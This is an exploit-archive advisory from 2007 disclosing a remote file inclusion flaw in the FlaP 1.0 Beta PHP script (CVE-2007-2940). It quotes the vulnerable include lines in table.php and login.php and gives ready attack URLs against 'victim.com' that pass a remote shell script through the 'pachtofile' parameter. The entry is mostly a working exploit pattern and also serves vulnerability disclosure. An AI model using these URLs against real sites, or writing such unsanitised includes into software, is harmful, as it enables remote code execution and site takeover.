FlaP 1.0b - 'pachtofile' Remote File Inclusion

EKU-ID: 11955	CVE: OSVDB-38052;CVE-2007-2940;OSVDB-38051	OSVDB-ID:
Author: Mehmet Ince	Published: 2007-05-25	Verified:
Download:
Rating

☆☆☆☆☆
##############################################################################################
# FlaP v.1.0. Beta  <=  Remote File Inclusion Vulnerability                                  #
#                                                                                            #

#                                                                                            #
##############################################################################################
#Vuln Code                                                                                   #

#                                                                                            #
#ERROR1:skin/html/table.php                                                                  #
#                                                                                            #

# <? include "$pachtofile/left_menu.php"; <<< RFI CODE                                       #
#                                                                                            #

#                                                                                            #
#BUG1:                                                                                       #
#                                                                                            #

#Example1:http://victim.com/path/skin/html/table.php?pachtofile=[[Sh3LL Script]]             #
##############################################################################################

#                                                                                            #
#ERROR2:login.php                                                                            #
#                                                                                            #

#<? include "$pachtofile/right_menu.php"; ?></ <<< RFI CODE                                  #
#                                                                                            #

#                                                                                            #
#BUG2:                                                                                       #
#                                                                                            #

#Example1:http://victim.com/path/login.php?pachtofile=[[Sh3LL Script]]                       #
##############################################################################################


##############################################################################################
#                                                                                            #
#Script Download                                                                             #

##############################################################################################
#                                                                                            #
#http://scripts.protoplex.ru/scripts_show/1854.html                                          #

#                                                                                            #
##############################################################################################
#                                                                                            #

#Cyber-Security                                                                              #
#                                                                                            #
##############################################################################################

# milw0rm.com [2007-05-25]